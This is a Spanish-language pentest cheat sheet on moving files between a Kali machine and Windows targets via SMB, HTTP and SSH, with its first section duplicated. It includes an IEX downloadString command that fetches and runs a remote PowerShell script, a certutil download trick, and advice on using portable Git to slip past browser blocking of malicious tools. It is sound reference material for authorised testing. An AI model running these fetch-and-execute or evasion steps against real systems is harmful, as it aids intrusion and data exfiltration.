Servidores temporales
SMB
Servidor SMB en Kali Acceso desde Windows
Se busca el binario de impacket-smbserver:
Copiar > locate smbserver
/usr/bin/impacket-smbserver
/usr/lib/python3/dist-packages/impacket/smbserver.py
/usr/lib/python3/dist-packages/impacket/__pycache__/smbserver.cpython-310.pyc
/usr/share/doc/python3-impacket/examples/smbserver.py
Se ejecuta una carpeta compartida vía SMB:
Copiar sharedfolder=/tmp/tempserver
mkdir $sharedfolder
cd $sharedfolder
impacket-smbserver share . -smb2support -username xtormin -password xtormin
Se monta la carpeta vía CMD/Powershell:
Copiar net use z: \\192.168.1.100\share /user:xtormin xtormin
Se accede a la carpeta compartida y se descargan los ficheros que se quieran:
Copiar net use \\<IP de Kali>\share /u:xtormin xtormin
copy file.zip \\<IP de Kali>\share\
del file.zip
net use /d \\<IP de Kali>\share
HTTP
HFS
Se ejecuta el binario hfs.exe descargado desde la interfaz gráfica y se añaden los ficheros que se deseen exponer en el servidor web.
Python
Copiar python3 -m http.server 8000
Descarga de ficheros
Servidores temporales
SMB
Servidor SMB en Kali Acceso desde Windows
Se busca el binario de impacket-smbserver:
Copiar > locate smbserver
/usr/bin/impacket-smbserver
/usr/lib/python3/dist-packages/impacket/smbserver.py
/usr/lib/python3/dist-packages/impacket/__pycache__/smbserver.cpython-310.pyc
/usr/share/doc/python3-impacket/examples/smbserver.py
Se sirve una carpeta compartida vía SMB:
Copiar sharedfolder=/tmp/tempserver
mkdir $sharedfolder
cd $sharedfolder
impacket-smbserver share . -smb2support -username xtormin -password xtormin
Se monta la carpeta vía CMD/Powershell:
Copiar net use z: \\192.168.1.100\share /user:xtormin xtormin
Se accede a la carpeta compartida y se descargan los ficheros que se quieran:
Copiar net use \\<IP de Kali>\share /u:xtormin xtormin
copy file.zip \\<IP de Kali>\share\
del file.zip
net use /d \\<IP de Kali>\share
HTTP
HFS
Se ejecuta el binario hfs.exe descargado desde la interfaz gráfica y se añaden los ficheros que se deseen exponer en el servidor web.
Python
Copiar python3 -m http.server 8000
Descarga y subida de ficheros
Linux
Copiar wget "https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1"
Windows
Copiar iwr https://192.168.1.110/winPEASx64.exe -outputfile winpeas64.exe
IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5:8000/Azure-ADConnect.ps1')
.\certutil.exe -urlcache -split -f "http://legacy.ps1"
SSH
Descarga desde servidor remoto a local:
Copiar USER='xtormin'
IP='192.168.1.100'
RUTASRV='C:/Users/xtormin/Documents/<archivo_zip>.zip'
RUTALOCAL='.'
scp $USER@$IP:$RUTASRV $RUTALOCAL
Subida desde local a servidor remoto:
Copiar USER='xtormin'
IP='192.168.1.100'
RUTASRV='C:/Users/xtormin/Documents/<archivo_zip>.zip'
RUTALOCAL='.'
scp $RUTALOCAL $USER@$IP:$RUTASRV
Git - Descarga de repositorios
En ocasiones, el navegador puede bloquear la descarga de ficheros que identifica como maliciosos. Una forma de descargarlos cuando es usando Git con su versión portable cuando no se pueda instalar o no se cuente con permisos de administrador local.
Git
Copiar cd PortableGit-2.46.2-64-bit
.\git-bash.exe
Esto abrirá una consola desde la que se podrá clonar el repositorio:
Copiar cd c/Pentest/Tools
git clone https://github.com/PowerShellMafia/PowerSploit.git
Referencias
Última actualización hace 1 día